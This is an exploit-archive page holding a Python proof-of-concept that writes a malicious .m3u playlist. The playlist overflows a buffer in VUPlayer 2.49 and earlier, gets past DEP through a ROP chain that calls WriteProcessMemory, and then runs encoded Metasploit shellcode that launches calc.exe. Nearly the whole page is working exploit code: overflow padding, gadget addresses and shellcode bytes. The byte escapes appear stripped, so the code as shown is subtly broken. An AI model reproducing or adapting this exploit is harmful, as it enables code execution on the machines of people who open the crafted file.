VUPlayer <=2.49 .M3u Universal buffer overflow exploit w/ DEP bypass

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : VUPlayer <=2.49 .M3u Universal buffer overflow exploit w/ DEP bypass
# Published : 2010-06-07
# Author : mr_me
# Previous Title : Castripper 2.50.70 (.pls) stack buffer overflow w/ DEP bypass exploit
# Next Title : Audio Converter 8.1 0day Stack Buffer Overflow PoC exploit

#!/usr/bin/env python
#
# VUPlayer <=2.49 .M3u Universal buffer overflow exploit w/ DEP bypass
# Author: mr_me
# Download: http://vuplayer.com/
# Tested on Wind0ws XP SP3 /noexecute=alwayson
# Greetz: Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
# 
# DEP AlwaysOn bypass version
# Thanks to Sud0 & Lincoln, for the motivation to learn this :-)
# 

# http://www.metasploit.com
# EXITFUNC=process, CMD=calc.exe
sc = ("x89xe1xd9xeexd9x71xf4x58x50x59x49x49x49x49"
"x43x43x43x43x43x43x51x5ax56x54x58x33x30x56"
"x58x34x41x50x30x41x33x48x48x30x41x30x30x41"
"x42x41x41x42x54x41x41x51x32x41x42x32x42x42"
"x30x42x42x58x50x38x41x43x4ax4ax49x4bx4cx4a"
"x48x47x34x43x30x45x50x45x50x4cx4bx51x55x47"
"x4cx4cx4bx43x4cx45x55x42x58x45x51x4ax4fx4c"
"x4bx50x4fx45x48x4cx4bx51x4fx51x30x43x31x4a"
"x4bx51x59x4cx4bx50x34x4cx4bx43x31x4ax4ex46"
"x51x49x50x4cx59x4ex4cx4dx54x49x50x42x54x45"
"x57x49x51x49x5ax44x4dx43x31x48x42x4ax4bx4c"
"x34x47x4bx50x54x47x54x45x54x43x45x4bx55x4c"
"x4bx51x4fx47x54x45x51x4ax4bx45x36x4cx4bx44"
"x4cx50x4bx4cx4bx51x4fx45x4cx43x31x4ax4bx4c"
"x4bx45x4cx4cx4bx45x51x4ax4bx4cx49x51x4cx46"
"x44x44x44x48x43x51x4fx50x31x4ax56x45x30x50"
"x56x42x44x4cx4bx51x56x50x30x4cx4bx51x50x44"
"x4cx4cx4bx44x30x45x4cx4ex4dx4cx4bx43x58x45"
"x58x4bx39x4ax58x4dx53x49x50x42x4ax50x50x43"
"x58x4ax50x4dx5ax44x44x51x4fx45x38x4ax38x4b"
"x4ex4cx4ax44x4ex50x57x4bx4fx4dx37x42x43x43"
"x51x42x4cx42x43x43x30x41x41");

crash = "HTTP://" + "x41" * 1005

rop = "xd3x72x60x10" # POPAD # JE SHORT BASSMIDI.10607337		: 0x106072D3 
rop += "x2fx10x60x10" # POP EDI # MOV EAX,ESI # POP ESI # RETN	: 0x1060102F
rop += "x13x22x80x7c" # @ of WriteProcessMemory()				: 0x7C802213
rop += "xcfx22x80x7c" # Address to patched in kernel32			: 0x7C8022CF
rop += "x44x44x44x44" # JUNK									: 0x44444444
rop += "xffxffxffxff" # start @ -1 for shellcode size			: 0xffffffff
rop += "x15x10x10x10" # This @ from .data segment of app dll	: 0x10101015 
rop += "x44x44x44x44" # JUNK									: 0x44444444
rop += "x44x44x44x44" # JUNK									: 0x44444444
rop += "x44x44x44x44" # JUNK									: 0x44444444
rop += "x79x21x60x10" # POP EDI # POP ESI # RETN				: 0x10602179
rop += "x88x71x60x10" # CALL EAX								: 0x10607188
rop += "xffxffxffxff" # -hProcess argv[1]						: 0xffffffff

# Get the length of shellcode - @ from kernel32
rop += "x6fx10x81x7c" * 305 # INC EBX # RETN					: 0x7C81106F

# push all args on the stack for WPM() - @ from shell32.dll
rop += "xf9x18xa1x7c" # PUSHAD # RETN							: 0x7CA118F9

buffer = crash + rop + sc

print "[+] Building .m3u file"
file = open('cst-vuplayer.m3u','w');
file.write(buffer);
file.close();
print "[+] Done"